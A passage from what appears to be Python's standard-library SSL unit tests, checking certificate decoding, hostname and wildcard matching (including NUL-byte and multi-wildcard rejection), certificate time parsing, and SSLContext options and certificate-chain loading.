self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry in subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
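# Dropping the last reference to an unclosed SSL socket should emit a
# ResourceWarning mentioning the socket's repr.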
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
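# get_default_verify_paths() returns a 6-field DefaultVerifyPaths result and
# honours the SSL_CERT_DIR / SSL_CERT_FILE environment variables.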
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
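# enum_certificates() yields (cert_bytes, encoding, trust) triples from the
# Windows CA and ROOT stores; the serverAuth OID must appear among the trust OIDs.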
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
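# enum_crls() yields (crl_bytes, encoding) pairs from the Windows CA store.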
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
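# _ASN1Object can be constructed from an OID string and looked up via
# fromnid() or fromname(); unknown NIDs and names raise ValueError.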
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
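# Purpose.SERVER_AUTH and Purpose.CLIENT_AUTH are _ASN1Object values with the
# expected NIDs, short names and OIDs.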
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
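# set_ciphers() accepts standard cipher strings; an unusable string raises
# SSLError ("No cipher can be selected").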
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Pass a password larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
